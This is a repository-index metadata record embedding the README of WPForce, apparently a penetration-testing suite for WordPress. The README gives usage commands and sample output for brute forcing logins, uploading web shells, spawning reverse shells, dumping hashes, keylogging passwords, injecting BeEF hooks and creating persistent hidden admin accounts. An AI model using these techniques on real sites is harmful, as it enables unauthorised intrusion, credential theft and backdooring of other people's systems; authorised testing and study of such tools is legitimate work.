{"id":13389929,"url":"https://github.com/n00py/WPForce","last_synced_at":"2025-03-13T14:32:17.915Z","repository":{"id":38816237,"uuid":"54152306","full_name":"n00py/WPForce","owner":"n00py","description":"Wordpress Attack Suite","archived":false,"fork":false,"pushed_at":"2021-02-16T23:47:36.000Z","size":142,"stargazers_count":953,"open_issues_count":11,"forks_count":227,"subscribers_count":49,"default_branch":"master","last_synced_at":"2025-03-12T13:08:37.645Z","etag":null,"topics":["hacking-tool","javascript","keylogger","pentest-tool","php","reverse-shell","wordpress","wordpress-attack","xss-exploitation"],"latest_commit_sha":null,"homepage":"https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n00py.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-03-17T21:20:14.000Z","updated_at":"2025-03-12T06:58:48.000Z","dependencies_parsed_at":"2022-07-17T08:46:34.189Z","dependency_job_id":null,"html_url":"https://github.com/n00py/WPForce","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n00py","download_url":"https://codeload.github.com/n00py/WPForce/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422708,"owners_count":20288506,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking-tool","javascript","keylogger","pentest-tool","php","reverse-shell","wordpress","wordpress-attack","xss-exploitation"],"created_at":"2024-07-30T13:01:40.324Z","updated_at":"2025-03-13T14:32:17.888Z","avatar_url":"https://github.com/n00py.png","language":"Python","readme":"![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)\n# WPForce - Wordpress Attack Suite \n\n## ABOUT:\nWPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules.\n\nFor more information, visit the blog post here: \nhttps://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/\n\nBlogs in other languages: \n\nChinese - www.mottoin.com/100381.html \n\nPortuguese - http://www.100security.com.br/wpforce/ \n\nSpanish - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html \n \n https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/\n\nRussian - https://hackware.ru/?p=2547\n\nFrench - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/ \n\nTurkish - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html\n\n\n## FEATURES:\n* Brute Force via API, not login form bypassing some forms of protection\n* Can automatically upload an interactive shell\n* Can be used to spawn a full featured reverse shell\n* Dumps WordPress password hashes\n* Can backdoor authentication function for plaintext password collection\n* Inject BeEF hook into all pages\n* Pivot to meterpreter if needed\n\n\n## INSTALL:\n```\nYertle requires the requests libary to run.\nhttp://docs.python-requests.org/en/master/user/install/\n```\n\n## USAGE:\n```\npython wpforce.py -i usr.txt -w pass.txt -u \"http://www.[website].com\"\n\n ,-~~-.___. __ __ ____ _____\n / | x \\ \\ \\ / /| _ \\ | ___|___ _ __ ___ ___\n ( ) 0 \\ \\ /\\ / / | |_) || |_ / _ \\ | '__|/ __|/ _ \\.\n \\_/-, ,----' ____ \\ V V / | __/ | _|| (_) || | | (__| __/\n ==== || \\_ \\_/\\_/ |_| |_| \\___/ |_| \\___|\\___|\n / \\-'~; || |\n / __/~| ...||__/|-\" Brute Force Attack Tool for Wordpress\n =( _____||________| ~n00py~\n\nUsername List: usr.txt (3)\nPassword List: pass.txt (21)\nURL: http://www[website].com\n--------------------------\n[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN\n--------------------------\n--------------------------\n[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!\n--------------------------\n 100% Percent Complete\nAll correct pairs:\n{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}\n\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Input file name\n -w WORDLIST, --wordlist WORDLIST\n Wordlist file name\n -u URL, --url URL URL of target\n -v, --verbose Verbose output. Show the attemps as they happen.\n -t THREADS, --threads THREADS\n Determines the number of threads to be used, default\n is 10\n -a AGENT, --agent AGENT\n Determines the user-agent\n -d, --debug This option is used for determining issues with the\n script.\n\n\npython yertle.py -u \"[username]\" -p \"[password]\" -t \"http://www.[website].com\" -i\n _..---.--. __ __ _ _\n .'\\ __|/O.__) \\ \\ / /__ _ __| |_| | ___\n /__.' _/ .-'_\\ \\ V / _ \\ '__| __| |/ _ \\.\n (____.'.-_\\____) | | __/ | | |_| | __/\n (_/ _)__(_ \\_)\\_ |_|\\___|_| \\__|_|\\___|\n (_..)--(.._)'--' ~n00py~\n Post-exploitation Module for Wordpress\n\nBackdoor uploaded!\nUpload Directory: ebwhbas\nos-shell\u003e\n\n\n\n -h, --help show this help message and exit\n -i, --interactive Interactive command shell\n -r, --reverse Reverse Shell\n -t TARGET, --target TARGET\n URL of target\n -u USERNAME, --username USERNAME\n Admin username\n -p PASSWORD, --password PASSWORD\n Admin password\n -li IP, --ip IP Listener IP\n -lp PORT, --port PORT\n Listener Port\n -v, --verbose Verbose output.\n -e EXISTING, --existing EXISTING\n Skips uploading a shell, and connects to existing\n shell\n\n\n```\n\nYertle currently contains these modules:\n\n```\nCore Commands\n=============\n \nCommand Description\n------- -----------\n? Help menu\nbeef Injects a BeEF hook into website\ndbcreds Prints the database credentials\nexit Terminate the session\nhashdump Dumps all WordPress password hashes\nhelp Help menu\nkeylogger Patches WordPress core to log plaintext credentials\nkeylog Displays keylog file\nmeterpreter Executes a PHP meterpreter stager to connect to metasploit\npersist Creates an admin account that will re-add itself\nquit Terminate the session\nshell Sends a TCP reverse shell to a netcat listener\nstealth Hides Yertle from the plugins page\n```\n","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FWPForce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn00py%2FWPForce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FWPForce/lists"}